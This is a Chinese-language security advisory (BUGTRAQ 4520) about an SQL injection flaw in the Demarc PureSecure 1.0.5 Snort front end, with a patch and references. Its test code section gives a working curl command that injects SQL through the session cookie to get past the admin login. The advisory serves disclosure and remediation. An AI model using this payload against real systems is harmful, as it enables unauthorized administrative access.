Demarc PureSecure验证检查SQL插入漏洞

发布时间：2002-04-19
更新时间：2002-04-19
严重程度：中
威胁程度：控制应用程序系统
错误类型：输入验证错误
利用方式：服务器模式

BUGTRAQ ID：4520

受影响系统

Demarc PureSecure 1.0.5 Windows
   - Martin Roesch Snort 1.8.3
   - Microsoft Windows 2000 Professional
   - Microsoft Windows 2000 Professional SP1
   - Microsoft Windows 2000 Professional SP2
   - Microsoft Windows NT Workstation 4.0
   - Microsoft Windows NT Workstation 4.0 SP1
   - Microsoft Windows NT Workstation 4.0 SP2
   - Microsoft Windows NT Workstation 4.0 SP3
   - Microsoft Windows NT Workstation 4.0 SP4
   - Microsoft Windows NT Workstation 4.0 SP5
   - Microsoft Windows NT Workstation 4.0 SP6a
   - Microsoft Windows XP Professional
Demarc PureSecure 1.0.5 Unix
   - Martin Roesch Snort 1.8.3

详细描述
Demarc PureSecure是商业性质的SNORT图形前端，可以集中网络监视。运行在多种系统平台下。

其中存在漏洞用户可以提供输入用来构建SQL查询，允许插入SQL并无需使用帐户和密码对管理员接口进行访问。

测试代码
curl -b s_key=\'%20OR%20current_session_id%20like%20\'%\'%23 https://<lame host>/dm/demarc

解决方案
在6113行增加: &safe_slash(\$session_id' );

或者采用如下补丁：

--- demarc Sun Nov 11 23:48:39 2001
+++ demarc-patched Tue Apr 16 12:49:56 2002
@@ -6094,6 +6094,7 @@
################
sub check_login{
my ($session_id) = @_;
+$session_id=~tr/[a-zA-Z0-9]//dc;

($session_id) || return;
&expire_sessions;

相关信息
pokleyzz sakamaniaka <pokleyzz@hotmail.com>.
参考：http://online.securityfocus.com/archive/1/267796
http://online.securityfocus.com/archive/1/267941
相关主页：http://www.demarc.com/

最近严重漏洞

Demarc PureSecure验证检查SQL插入漏洞